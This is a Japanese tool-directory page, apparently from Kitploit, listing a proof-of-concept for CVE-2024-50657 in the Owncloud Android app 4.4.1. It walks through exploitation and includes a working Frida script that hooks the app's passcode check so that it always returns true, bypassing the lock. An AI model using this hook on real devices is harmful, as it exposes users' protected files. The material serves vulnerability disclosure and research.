Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-50657 — CVE-2024-50657の概念実証エクスプロイトを提供します。これはOwncloud Androidアプリの不正確なアクセス制御の脆弱性であり、Fridaフックによるパスコードバイパスを実証します。 | Kitploit
ツール/GitHubGitHub/sahalll/cve-2024-50657
Androidセキュリティ脆弱性分析エクスプロイトペネトレーションテストモバイルセキュリティ
GitHubsahalll/cve-2024-50657

CVE-2024-50657

CVE-2024-50657の概念実証エクスプロイトを提供します。これはOwncloud Androidアプリの不正確なアクセス制御の脆弱性であり、Fridaフックによるパスコードバイパスを実証します。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-50657: Owncloud APKにおける不適切なアクセス制御

Owncloud Android APK v.4.4.1に存在する問題により、物理的に近接する攻撃者がPassCodeViewModelクラス、特にcheckPassCodeIsValidメソッドを介して権限を昇格させる可能性があります。

脆弱性の種類

不適切なアクセス制御

製品ベンダー

Owncloud

影響を受ける製品コードベース

Owncloud Android APK - 4.4.1

影響を受けるコンポーネント

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

悪用方法

対象のクラスとメソッドを特定する:

PassCodeViewModelクラスはアプリケーション内でパスコード検証のロジックを管理します。 このクラスのcheckPassCodeIsValidメソッドは、入力されたパスコードの正当性を判定する役割を担います。

Fridaを使ってメソッドをフックする:

Fridaスクリプトを使用して、PassCodeViewModelクラスのcheckPassCodeIsValidメソッドをフックします。 メソッドの実装を常にtrueを返すように変更し、実際のパスコード検証をバイパスします。

実行:

アプリが実行されている状態でFridaスクリプトを実行します。 ユーザーが入力したパスコードはすべて有効と見なされ、不正アクセスが可能になります。

PoC

Java.perform(function() { // 対象アプリケーション内のPassCodeViewModelクラスを特定する var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// checkPassCodeIsValidメソッドをフックして動作を変更する PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// 実際のパスコードチェックをバイパスし、常にtrueを返す return true;

};

});

動画PoCリンク : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

影響:-

この脆弱性はクライアントサイドのセキュリティバイパス脆弱性です。パスコード機能に依存して機密データを保護したり、特定のアプリ機能へのアクセスを制限したりするアプリケーションのユーザーに影響を及ぼします。この脆弱性を悪用することで、攻撃者はパスコードチェックをバイパスし、保護されるべきアプリ内の領域への不正アクセスを取得し、ユーザーデータを露出させたり、アプリ内で許可されていない操作を実行したりする可能性があります。

ツールをダウンロード